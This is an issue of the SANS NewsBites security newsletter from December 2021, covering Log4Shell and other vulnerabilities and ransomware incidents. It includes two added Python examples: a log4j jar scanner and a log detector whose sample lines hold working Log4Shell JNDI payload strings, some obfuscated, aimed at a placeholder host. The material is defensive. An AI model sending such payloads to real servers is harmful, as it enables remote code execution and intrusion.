SANS NewsBites

Need for Prioritized Remediation of Log4Shell Vulnerabilities Will Remain Critical; Mozilla Advances Browser Global Privacy Control; Patching Needed for Critical Vulnerabilities Across Apple iOS and iPadOS Devices

December 14, 2021  |  Volume XXIII - Issue #97

Top of the News


2021-12-13

CISA Adds Log4J to Catalog of Known Exploited Vulnerabilities

In a statement over the weekend, Cybersecurity and Infrastructure Security Agency (CISA) director Jen Easterly said, “We have added this vulnerability to our catalog of known exploited vulnerabilities, which compels federal civilian agencies -- and signals to non-federal partners -- to urgently patch or remediate this vulnerability.” GitHub’s list includes hundreds of affected services with links to each service’s security advisory.

Editor's Note

CVE-2021-44228, or log4shell as the vulnerability has been named, has kept us all pretty busy this weekend. We have only seen the beginning of what will be a vast effort to protect from this vulnerability. Most attacks are currently attempting to very simply “spray” the exploit string into frequently logged fields. Over time, attackers will get better at targeting specific software packages. We have seen a bit of this with VMware vCenter. Affected security tools present a huge target that attackers will not fail to exploit. While dealing with log4shell, make sure to preserve your notes. History has shown that once a high profile vulnerability like this is found, people will look for similar issues in other tools, and also take a deeper look at the affected library. JNDI is not unique to log4j and is a well-known issue. Another "lesson learned" of this still evolving incident: Secure configurations matter. The vulnerability may be mitigated by disabling the risky JNDI feature, and it looks like log4j will start shipping with it disabled by default. But for now: patch... patch... patch...

Johannes Ullrich

If you’re using Log4J 1.x, it is no longer supported, and you need to move to Log4j 2. Update to at least Log4J 2.16. Even so, you need to take actions to ensure you’re secure. Enumerate your externally facing devices with log4j installed, make sure your SOC is monitoring all the alerts from them, and configure a WAF to reduce the attack surface and volume of alerts. If you have applications developed in Java and you have been contemplating migrating them to another technology, you may want to execute that plan, particularly if you no longer have your Java expertise.

Lee Neely
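Enumerating where log4j actually sits, including copies shaded into fat jars or bundled inside wars, is the first step the note above calls for. The following is an added example, not code from the newsletter or from SANS: it walks a directory, descends into nested archives, reads the log4j-core version from the jar manifest, and checks whether the JndiLookup class is present. The 2.16.0 threshold is the note's own advice; the sample directory tree it builds is constructed for the demonstration, with placeholder class entries rather than real bytecode.

```python
import io
import os
import re
import tempfile
import zipfile

# Added example, not newsletter or SANS code. The 2.16.0 threshold follows the note above;
# 1.x is flagged as unsupported. Class paths are those of the real log4j packages.
JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
LOG4J2_CORE_PREFIX = "org/apache/logging/log4j/core/"
LOG4J1_PREFIX = "org/apache/log4j/"
MIN_SAFE_VERSION = (2, 16, 0)
ARCHIVE_SUFFIXES = (".jar", ".war", ".ear")

def parse_version(text):
    """'2.14.1' -> (2, 14, 1); '2.16' -> (2, 16, 0); anything else -> None."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", text or "")
    return tuple(int(p) for p in m.groups(default="0")) if m else None

def manifest_version(zf):
    """Implementation-Version from META-INF/MANIFEST.MF, or None if the jar has no manifest."""
    try:
        manifest = zf.read("META-INF/MANIFEST.MF").decode("utf-8", "replace")
    except KeyError:
        return None
    for line in manifest.splitlines():
        if line.startswith("Implementation-Version:"):
            return line.split(":", 1)[1].strip()
    return None

def classify(version, has_jndi_lookup, is_log4j1):
    """Turn the evidence into the action a defender should take with this copy."""
    if is_log4j1:
        return "log4j 1.x: unsupported, migrate to 2.x"
    parsed = parse_version(version)
    if parsed is None:
        return "unknown version: inspect manually"
    if parsed >= MIN_SAFE_VERSION:
        return "at or above 2.16.0"
    if not has_jndi_lookup:
        return f"{version} below 2.16.0, JndiLookup.class removed: still update"
    return f"{version} below 2.16.0: patch"

def inspect_archive(data, label, findings, depth=0):
    """Record a finding if the archive carries log4j classes, then descend into nested archives."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return
    names = zf.namelist()
    is_log4j2 = any(n.startswith(LOG4J2_CORE_PREFIX) for n in names)
    is_log4j1 = any(n.startswith(LOG4J1_PREFIX) for n in names)
    if is_log4j2 or is_log4j1:
        findings[label] = classify(manifest_version(zf), JNDI_LOOKUP_CLASS in names, is_log4j1)
    if depth < 3:  # jar inside war inside ear is common; bound the recursion anyway
        for n in names:
            if n.endswith(ARCHIVE_SUFFIXES):
                inspect_archive(zf.read(n), f"{label}!{n}", findings, depth + 1)

def scan_directory(root):
    """Walk root and return {archive label: status} for every log4j copy found."""
    findings = {}
    for dirpath, _, filenames in os.walk(root):
        for fn in filenames:
            if fn.endswith(ARCHIVE_SUFFIXES):
                path = os.path.join(dirpath, fn)
                label = os.path.relpath(path, root).replace(os.sep, "/")
                with open(path, "rb") as fh:
                    inspect_archive(fh.read(), label, findings)
    return findings

def make_jar(version, *classes):
    """Constructed jar: a manifest plus placeholder class entries (class-file magic only)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("META-INF/MANIFEST.MF", f"Manifest-Version: 1.0\nImplementation-Version: {version}\n")
        for name in classes:
            zf.writestr(name, b"\xca\xfe\xba\xbe")
    return buf.getvalue()

def build_sample_tree(root):
    """Constructed layout: an old core jar, a war nesting a patched core jar, and a legacy 1.x jar."""
    lib = os.path.join(root, "app", "lib")
    os.makedirs(lib)
    with open(os.path.join(lib, "log4j-core-2.14.1.jar"), "wb") as fh:
        fh.write(make_jar("2.14.1", LOG4J2_CORE_PREFIX + "Logger.class", JNDI_LOOKUP_CLASS))
    with open(os.path.join(lib, "log4j-1.2.17.jar"), "wb") as fh:
        fh.write(make_jar("1.2.17", LOG4J1_PREFIX + "Logger.class"))
    with zipfile.ZipFile(os.path.join(root, "app", "service.war"), "w") as war:
        war.writestr("WEB-INF/lib/log4j-core-2.16.0.jar",
                     make_jar("2.16.0", LOG4J2_CORE_PREFIX + "Logger.class", JNDI_LOOKUP_CLASS))

def demo():
    """Build the constructed tree in a temp dir and scan it; returns {label: status}."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        return scan_directory(tmp)
```

Running `demo()` reports three copies: the 2.14.1 jar to patch, the 2.16.0 jar found only by descending into the war, and the 1.x jar flagged as unsupported. Pointing `scan_directory` at a real application root gives the same map for that host; the nested-archive descent is what catches the embedded copies the note warns about, where you depend on a third party's update rather than your own.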

What makes this vulnerability so unique is just how ubiquitous it is (if your system, application or device is logging, it could be vulnerable), but what is also unique is the attack surface. For this attack you are not remotely connecting to a specific port for a specific application; instead you are attacking any input that logs that input, such as connections to a web server, email filtering, etc. For an excellent overview of the attack and defenses, check out the webcast by SANS and instructors: https://www.youtube.com/watch?v=oC2PZB5D3Ys

Lance Spitzner
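Because the attack surface described above is any field that ends up in a log, detection has to run over the logs themselves. The block below is an added example, not code from the newsletter or from SANS: it flags log4j lookup strings in log lines and, since log4j resolves nested lookups before acting on them, first normalizes the `${lower:…}`, `${upper:…}` and `${…:-default}` forms that would otherwise hide a lookup from a plain substring match. The log lines and hostnames are constructed for the demonstration.

```python
import re

# Added example, not newsletter or SANS code. log4j resolves innermost lookups first:
# ${lower:X} -> x, ${upper:x} -> X, ${prefix:key:-default} -> default (when the key is unset).
NESTED = re.compile(
    r"\$\{(?:lower|upper):([^${}]*)\}"   # case-conversion lookups
    r"|\$\{[^${}]*?:-([^${}]*)\}",       # default-value syntax; the default is what survives
    re.IGNORECASE,
)
JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def normalize(text, max_rounds=10):
    """Collapse nested lookups the way log4j's interpolator would, bounded against pathological input."""
    for _ in range(max_rounds):
        resolved = NESTED.sub(lambda m: m.group(1) if m.group(1) is not None else m.group(2), text)
        if resolved == text:
            break
        text = resolved
    return text


def classify_line(line):
    """Verdict for one logged line, plus the normalized form an analyst should review."""
    normalized = normalize(line)
    if JNDI.search(line):
        verdict = "lookup"
    elif JNDI.search(normalized):
        verdict = "obfuscated lookup"
    else:
        verdict = "clean"
    return {"verdict": verdict, "normalized": normalized, "line": line}


def scan_lines(lines):
    """Classify every line; callers typically feed this from a log tail or a SIEM export."""
    return [classify_line(line) for line in lines]


# Constructed access-log lines (RFC 5737 addresses, reserved .invalid TLD); not captured traffic.
SAMPLE_LINES = [
    '203.0.113.5 - - [13/Dec/2021:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"',
    '203.0.113.7 - - [13/Dec/2021:10:01:09 +0000] "GET / HTTP/1.1" 200 "${jndi:ldap://lookup.example.invalid/a}"',
    '203.0.113.9 - - [13/Dec/2021:10:02:33 +0000] "GET / HTTP/1.1" 200 "${${lower:j}ndi:ldap://lookup.example.invalid/b}"',
    '203.0.113.4 - - [13/Dec/2021:10:03:11 +0000] "GET / HTTP/1.1" 200 "${${::-j}${::-n}${::-d}${::-i}:rmi://lookup.example.invalid/c}"',
]

if __name__ == "__main__":
    for result in scan_lines(SAMPLE_LINES):
        print(f"{result['verdict']:18} {result['line']}")
```

The design point is that the match runs on the normalized string, not the raw one: a detector that only greps for the literal `${jndi:` misses the third and fourth sample lines, while this one reports them as obfuscated lookups and keeps the raw line for the analyst. Because any logged field is in scope, the same function should be run over user-agent, referer and custom header fields, not just the request line.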

2021-12-13

Log4Shell Exploit is Going to be Around for a Long Time

The US Cybersecurity and Infrastructure Security Agency (CISA) estimates that there are hundreds of millions of devices that are vulnerable to Log4Shell. Rob Joyce said that “The log4j vulnerability is a significant threat for exploitation due to the widespread inclusion in software frameworks, even NSA’s GHIDRA. This is a case study in why the software bill of material (SBOM) concepts are so important to understand exposure.” Jake Williams said that “if you're patching #log4j today on an Internet facing service, you need to be doing an incident response too. The reality is that someone else almost certainly beat you to it. Patching doesn't remove the existing compromise.”

Editor's Note

When Log4j was introduced, it provided visibility and logging capabilities to our Java applications and services which we all leveraged, and it is now included in many packages and distributions, meaning you’re going to have to work to make sure that it’s updated everywhere, particularly where it is embedded and you’re reliant on a third-party update. You need to take active steps to monitor and protect yourself, as well as verify you’re not already compromised. When you’re done updating, don’t turn off the monitoring.

Lee Neely

It’s also important to note that if you scan for this vulnerability and discover your system is patched, make sure it was you who applied that patch. Criminals are known to patch systems they compromise to prevent others from doing the same.

Brian Honan

2021-12-10

Mozilla Global Privacy Control Now Available to All Users

Mozilla has made Global Privacy Control (GPC) available to all users; the browser setting was rolled out on a limited basis earlier this fall. GPC tells websites not to share your personal data. The European Union’s General Data Protection Regulation (GDPR) requires GPC, but just two US states – Colorado and California – have laws that allow GPC enforcement.

Editor's Note

Consumer demand for increased privacy online is becoming more important to many businesses than regulatory pressure. Many software architects at consumer-facing software companies are seeing support for privacy as one of their high priority product requirements, not something security or legal teams are jamming in. As browser software vendors, Google and Mozilla are the initial touchpoint for those demands from consumers and they are both doing a good job of raising the bar on protecting users and their data.

John Pescatore

This allows the browser to send a GPC opt-out signal to the far-end web site, but that web site has to have implemented code to respond to that signal, which is unlikely in areas where the legislation doesn’t apply (e.g., not in California, Colorado, or the EU). As this control expects the web server to have implemented controls, even when we see widespread adoption of response to GPC signals, it’s not clear this will truly be an effective privacy control.

Lee Neely

2021-12-13

Apple Releases Updates for Multiple OSes

Apple has released updates for multiple operating systems, including macOS, iOS, watchOS, iPadOS, and tvOS. The new iOS and iPadOS updates address 42 CVEs and add new features, including Apple Music Voice Plan, “App Privacy Report” and new “communication safety” settings intended to notify parents when their children receive or send photos that contain nudity.

Editor's Note

The iOS, iPadOS, watchOS, tvOS and HomePod updates fix numerous RCE, Information Disclosure and Privilege Escalation flaws. You’ll want to push this out before the holidays. The new iOS App Privacy Report (in Settings under Privacy) shows which apps are accessing which sensitive items like photos, contacts, and location, as well as network activity. Use this to make sure that you don’t have unintended access and adjust permissions accordingly. The communication safety settings are under the Screen Time settings group and can be controlled via a separate passcode. Screen Time settings can also be shared across devices. The service is, by default, not enabled.

Lee Neely

While well intentioned, the "communication safety" mechanism is likely to produce unintended consequences.

William Hugh Murray



2021-12-15

SANS Holiday Hack Challenge

The most festive cyber security challenge and virtual conference of the year, the SANS Holiday Hack Challenge, has officially opened for play!

Complete a series of FREE super fun, high-quality, hands-on cybersecurity challenges to help Santa save the whole holiday season from treachery. This year, we're back at Santa’s castle, but our familiar foe Jack Frost is back at his shenanigans, too. There’s a big new structure next door and talk of a new conference competing with KringleCon.

All ages and skill levels are welcome! We've got some whimsical and wonderful challenges and KringleCon talks to help you build critical cyber security skills to make the world a safer, more secure place. Enjoy yourself at the conference and make sure you check out our new holiday music soundtrack, too.

The Rest of the Week's News


2021-12-13

Log4Shell Vulnerability is Being Actively Scanned for and Exploited

Attackers are scanning the Internet for vulnerable instances of Log4j. The vulnerability has been exploited to deploy ransomware and coin miners.

Editor's Note

I am always fascinated by what is done with an exploit. One hopes you’d detect the impact of a crypto miner immediately, but what about other anomalous behavior? Ask yourself if you have enough information about what normal is to detect changes. There are multiple lists of Log4Shell IOCs; there is a free one on GitHub you can leverage: https://github.com/curated-intel/Log4Shell-IOCs

Lee Neely

2021-12-13

Ransomware Attack Hits Kronos

Kronos Private Cloud has been hit with a ransomware attack and has taken its private cloud services offline. The company is advising its customers to use “alternative business continuity protocols” until the issue is resolved. Kronos provides cloud-based solutions for workforce management and human resources.

Editor's Note

One of the services provided by Kronos is running payroll on behalf of their clients; this service has also been impacted. Have you considered in your BCP how your organization would manage its payroll in the event of those systems being disrupted? If not, now is the time to look into that.

Brian Honan

Did you fully account for your HR or other workforce systems being offline for several weeks in your continuity of operations (COOP) plan? While the timing is never good to enact your continuity plan, the holidays this month and next provide options for time accounting which may make it easier to bridge that gap. You’re going to want to tabletop all workforce management actions to see what has to wait and what has a workaround.

Lee Neely

While the vendor's advice to "implement alternative business continuity protocols" may seem trite, business continuity planning is absolutely still a thing – even though we've pushed so much to SaaS/PaaS/etc. Thousands of healthcare, law enforcement, and retail organizations are whipping up Excel sheets this week to keep up operations. You always need a Plan B! Be sure to include any single point of failure in your tabletop exercises.

Christopher Elgee

2021-12-13

Report: Irish Health Service Executive Ransomware Attack

According to a report from PWC, the attackers behind the ransomware attack that shut down the Irish Health Service Executive (HSE) last spring gained initial access through a phishing email. The Independent Post Incident Review says that HSE invoked its Critical Incident Process once it became aware of the situation.

Editor's Note

This report from PWC is an excellent read for anyone involved in cybersecurity with lessons and recommendations that many organizations should take on board. Huge kudos to the HSE for publishing this report even though they were not required to do so. Open and transparent sharing of post incident reports is a key tool in us all ensuring the security and safety of our systems and the Internet.

Brian Honan

This report describes factors and warning signs that were missed. Look at these to see if you have missed anything. Is your endpoint-protection/anti-malware service in active blocking mode? Do you have any legacy operating systems? If so, how are you protecting them? Is your network protected from them? Are you only focused on user endpoints for security, or are you including servers – particularly domain controllers? Specialized servers like these are good candidates for explicit allow and deny execution controls. How is your segmentation? Is it still intact, or has it been weakened by many exceptions? Be sure to look at resources in your sector ISOC, CISA, etc., which can provide assistance/expertise to help your budget and resources go further.

Lee Neely

2021-12-13

Chrome Update Addresses Zero-Day

Google has pushed out an update for Chrome to fix a high-severity use-after-free vulnerability in the Chrome V8 JavaScript engine that is being actively exploited. In all, the newest version of Chrome includes fixes for five security issues; four are high severity and one is deemed critical. Chrome 96.0.4664.110 for Windows, Mac, and Linux will roll out over the coming weeks.

Editor's Note

When the update is pushed, Chrome has to be relaunched; monitor to make sure that happens within an acceptable window if you’re not stopping Chrome when deploying the update. While the update is scheduled to be released over a few weeks, double check to see if you can’t already download the updated version for your clients.

Lee Neely

2021-12-10

CISA Warns of Flaw in Hillrom Cardio Products

The US Cybersecurity and Infrastructure Security Agency (CISA) has issued an ICS Medical Advisory regarding a vulnerability in Hillrom Welch Allyn Cardio products. The authentication bypass vulnerability affects multiple versions of several products when configured to use single sign-on.

Editor's Note

Until Hillrom updates are released and deployed, disable SSO on those products and ensure you’re isolating them from the business network and other systems, only allowing access by authorized systems and users, and not exposing them directly to the Internet.

Lee Neely

2021-12-13

Hellmann Working to Recover from Cyberattack

Hellmann Worldwide Logistics is recovering from a cyberattack. The company isolated its central data center after realizing its network was under attack. As of 4pm ET Monday afternoon, the company’s latest update says “[Our] business operations are largely running again and we are confident that we can eliminate remaining restrictions soon to be operating at full capacity again.”

Internet Storm Center Tech Corner

Log4Shell Becoming Part of the Day to Day Grind

https://isc.sans.edu/forums/diary/Log4Shell+exploited+to+implant+coin+miners/28124/

https://www.youtube.com/watch?v=oC2PZB5D3Ys


Remote Code Execution in log4j2

https://isc.sans.edu/forums/diary/RCE+in+log4j+Log4Shell+or+how+things+can+get+bad+quickly/28120/


Log4j2/Log4Shell Followup: What we see and how to defend and how to access our data

https://isc.sans.edu/forums/diary/Log4j+Log4Shell+Followup+What+we+see+and+how+to+defend+and+how+to+access+our+data/28122/


Log4j Zero Day

https://www.lunasec.io/docs/blog/log4j-zero-day/


Log4Shell Vendor Bulletins

https://gist.github.com/SwitHak/b66db3a06c2955a9cb71a8718970c592


Google Chrome Update

https://chromereleases.googleblog.com/2021/12/stable-channel-update-for-desktop_13.html


Malicious PyPi Packages

https://medium.com/ochrona/3-new-malicious-packages-found-on-pypi-a6bbb14b5e2